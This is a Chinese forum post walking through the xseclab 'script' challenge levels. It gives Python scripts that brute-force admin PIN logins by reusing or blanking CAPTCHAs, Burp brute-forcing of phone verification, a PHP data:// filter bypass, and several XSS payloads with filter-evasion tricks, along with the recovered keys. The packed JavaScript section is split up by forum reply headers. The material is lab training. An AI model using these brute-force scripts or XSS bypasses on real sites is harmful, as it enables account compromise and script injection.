网络安全实验室3.脚本关

websec · 发表于 2023-2-8 15:21:21

人人为我，我为人人。登录后免费下载所有资源。

您需要登录才可以下载或查看，没有账号？立即注册

×

1.key又又找不到了url：http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php点击链接，burp抓包，发送到重放模块，点击go得到key is : yougotit_script_now

1675846611_63e363d388613dadb48ff.png

2.快速口算url：http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.phppython3脚本import requests, re
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
s = requests.session()

c = s.get(url).content
print(c)
c=c.decode('utf-8')#python3一定要加上这一句
r = re.findall(r'[\d]{2,}',c)
r = int(r[0])*int(r[1])+int(r[2])*(int(r[3])+int(r[4]))
c1 = s.post(url, data={'v':r}).content
print(c1.decode('utf-8'))得到key is 123iohHKHJ%^&*(jkh

1675846612_63e363d4470c5190e9f76.png

3.这个题目是空的试了一圈最后发现是null4.怎么就是不弹出key呢？url：http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php先点了链接发现没反应，审查元素后发现一大段js代码，发现a是个匿名函数，代码中还有禁止弹窗的函数，复制下来，删除前面几个函数，修改打印的值，保存成HTML文件，在浏览器打开script>
var a = function () {
var b = function (p, a, c, k, e, r) {
e = function (c) {
return (c a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [
function (e) {
return r[e]
}
];
e = function () {
return '\\w+'
};
c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(ca?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(ca?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;29;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\\\\\',H,H,\\\\\\\'

reply4 · 发表于 2023-2-8 15:25:00

A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\'.K(\\\\\\\'|\\\\\\\'),0,{}))\\\',X,X,\\\'

reply4 · 发表于 2023-2-8 15:33:25

S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\'.14(\\\'|\\\'),0,{}))\',1t,1u,\'

reply1 · 发表于 2023-2-8 15:47:05

||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\'.1r(\'|\'),0,{}))', 62, 98, '

reply3 · 发表于 2023-2-8 16:04:27

return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'), 0, {
});
var d = eval(b);
alert('key is first 14 chars' + '\n'+d.substr(0,14));
}()
/script>得到slakfjteslkjsd

1675846613_63e363d52ab06abab442e.png

5.逗比验证码第一期url：http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php首先观察验证码，发现可以重复使用第一种方法：Python3脚本，记得要改cookie和验证码的值，要匹配，用自己网站的就可得到密码为1238，key is LJLJL789sdf#@sdimport requests
import re
s=requests.Session()
url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
head={'cookie':'PHPSESSID=21949ea3cea7b84b9bf57f8d4b449a63'}
for num in range(1000,10000):
data={'username':'admin','pwd':num,'vcode':'99QZ','submit':'submit'}
res=s.post(url,data=data,headers=head).content.decode('utf-8')
if u'pwd error' in res:
print('正在尝试',num,'-----密码错误！')
if u'vcode error' in res:
print('验证码错误，请重新查看并输入正确验证码！')
# print(res)
if u'error' not in res:
print(num,'-------正确')
print(res)
break第二种方法：用burp爆破

1675846613_63e363d5baf3afbf74d32.png

6.逗比验证码第二期url：http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php将验证码参数设置为空得到密码为1228，key is LJLJL789ss33fasvxcvsdf#@sd第一种方法：Python3脚本import requests
import re
s=requests.Session()
url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
head={'cookie':'PHPSESSID=844e5142519e671ce9180b9a47588675'}
for num in range(1000,10000):
data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
res=s.post(url,data=data,headers=head).content.decode('utf-8')
if u'pwd error' in res:
print('正在尝试',num,'-----密码错误！')
if u'vcode error' in res:
print('验证码错误，请重新查看并输入正确验证码！')
# print(res)
if u'error' not in res:
print(num,'-------正确')
print(res)
break第二种方法：用burp爆破，将验证码参数设置为空

1675846614_63e363d67bdfc07824c1b.png

1675846615_63e363d77728eda64ba94.png

7.逗比的验证码第三期（SESSION）url：http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/index.php提示说的是要保持session第一个使用python3脚本得到密码1298， key is LJLJLfuckvcodesdf#@sdimport requests
import re
s=requests.Session()
url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
for num in range(1000,10000):
data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
res=s.post(url,data=data,headers=head).content.decode('utf-8')
if u'pwd error' in res:
print('正在尝试',num,'------密码错误!')
if u'vcode error' in res:
print('验证码错误！')
break
if u'error' not in res:
print(num,'----密码破解成功！')
print(res)
break
第二个使用python2脚本
import requests
s = requests.Session()
url = "http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
header = {"Cookie": "PHPSESSID=09462a3c9f8553aa536d87ab8b3c6614"}

for pwd in range(1000,10000):
payload = {'username': 'admin', 'pwd':pwd ,'vcode': ''}
r = s.post(url,headers=header,data=payload).content
if r.count("key"):
print r,pwd第三个使用burp爆破，方法同8.微笑一下就能过关了url：http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php查看源代码我们可以发现一个超链接，打开这个超链接是PHP源代码，

1675846616_63e363d826a9569527763.png

发现必须满足以下条件1.必须对"^_^"赋值

2."^_^"的值不能有 . % [0-9] http https ftp telnet 这些东西

3.$_SERVER['QUERY_STRING'],即"^_^=(输入的值)"这个字符串不能有 _ 这个字符

4.满足$smile!=0

5.file_exists ($_GET['^_^'])必须为0.也就是$_GET['^_^']此文件不存在

6."$smile"必须等于"(●'◡'●)".也就是file_get_contents($_GET['^_^'])必须为"(●'◡'●)"

既要对"^_^"赋值,又得想办法去掉"^_^"中的"_",那么可以采用Url编码变为"%5f".所以我们输入就应该为 "^%5f^".

代码把 http https ftp telnet 这些给过滤了,而又要求通过file_get_contents()取出$_GET['^_^']里的值.但,$_GET['^_^']又必须不存在.所以$_GET['^_^']只能是字符串"(●'◡'●)",不可能是文件名.那么file_get_contents()里的参数应该是啥呢.查了一下,发现data://完美符合.所以我们输入就应该为"^%5f^=data:,(●'◡'●)"http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php?^%5f^=data:,(●'◡'●)得到key：hkjasfhsa*&IUHKUH9.逗比的手机验证码url :http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/点击获取验证码，并填入5141

1675846616_63e363d8ec7f01ca46c1c.png

返回之前的界面再获取一次验证码，换为这个手机号重新登陆

1675846617_63e363d999c974bd86db5.png

得到key is LJLJLGod!@@sd

1675846618_63e363da53ecdd84eaae3.png

10.基情燃烧的岁月url：http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/burp抓包，根据提示三位数密码首位不为0，进行爆破，得到前任的手机号码是:13399999999

1675846619_63e363db0fb5a5ac9be04.png

继续用13399999999进行爆破，得到flag is {LKK8*(!@@sd}

1675846619_63e363dbd50fb2031459b.png

11.验证码识别url：http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php使用pkav神器首先使用burp抓包，并且复制到pkav的请求包模块，进行设置

1675846620_63e363dccfe392d59d2e6.png

进行重放设置

1675846621_63e363ddedce565055655.png

验证码识别设置

1675846623_63e363df3dc591285ff57.png

重放选项设置

1675846624_63e363e00f623edd7f7f6.png

点击长度即可自动排序，得到flag{133dbc85dda4aa**)}

1675846625_63e363e109d917bef7721.png

12.XSS基础关url：http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php右键查看源代码，点击../xssjs/xss_check.php链接，查看代码

1675846625_63e363e1e3a884530a97d.png

构造payload:script>alert(HackingLab)/script>得到key is: myxssteststart!

1675846626_63e363e2e0e7607e0b40e.png

13.XSS基础2:简单绕过url：http://lab1.xseclab.com/realxss2_bcedaba7e8618cdfb51178765060fc7d/index.php构造payload：img src=x onerror="alert(HackingLab)">得到key is: xss2test2you

1675846627_63e363e3954e24c91ac6f.png

14.XSS基础3:检测与构造url：http://lab1.xseclab.com/realxss3_9b28b0ff93d0b0099f5ac7f8bad3f368/index.php第一个输入框中输入的内容提交后会写入第二个文本框内，但是写入前做了处理,当 value 为敏感字符串时，出现的敏感字符串反而不会被过滤构造payload：alert' onmouseover=alert(HackingLab)> 得到key is: xss3test2youOK_striptag

1675846628_63e363e440bd4174872e3.png

15.Principle很重要的XSSurl：http://lab1.xseclab.com/realxss4_9bc1559999a87a9e0968ad1d546dfe33/index.php首先输入

javascript:alert(1)

复制代码

，被屏蔽尝试绕过

javascc>ript:alert(1)

复制代码

结果却被屏蔽，有以下两种情况：1.后端代码是先匹配删除掉括号再进行的关键词查找2.alert被屏蔽先测试下第二个情况

javascc>ript:alc>ert(1)

复制代码

可以看到插入进去

1675846629_63e363e51856464ecbfe4.png

并弹窗

1675846629_63e363e5bd89b535a4eda.png

构造payload：

javascc>ript:alc>ert(HackingLab)

复制代码

得到key is: xss4isnoteasy

1675846630_63e363e67ecbddbaef3c2.png

另外的payload空格的情况有点特殊，应该是正则表达但是也是可以绕过的只要空格前面有字符就会被屏蔽那么我们把空格放在第一个test

1675846631_63e363e73b1141579a3e1.png

正常通过那么试试是不是屏蔽了所有空格test

1675846631_63e363e7d7429663988d7.png

事实证明只会屏蔽第一个空格那么构建如下payload' onmouseover=alc>ert(HackingLab)>
'onmouseover=alc>ert(HackingLab)>成功弹窗！文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。转载声明：儒道易行拥有对此文章的修改和解释权，如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章的内容，不得以任何方式将其用于商业目的。
博客:https://rdyx0.github.io/先知社区：https://xz.aliyun.com/u/37846SecIN:https://www.sec-in.com/author/3097CSDN:https://blog.csdn.net/weixin_48899364?type=blog公众号：https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirectFreeBuf：https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

[Web安全] 网络安全实验室3.脚本关

人人为我，我为人人。登录后免费下载所有资源。

相关帖子

账号		自动登录	找回密码
密码			立即注册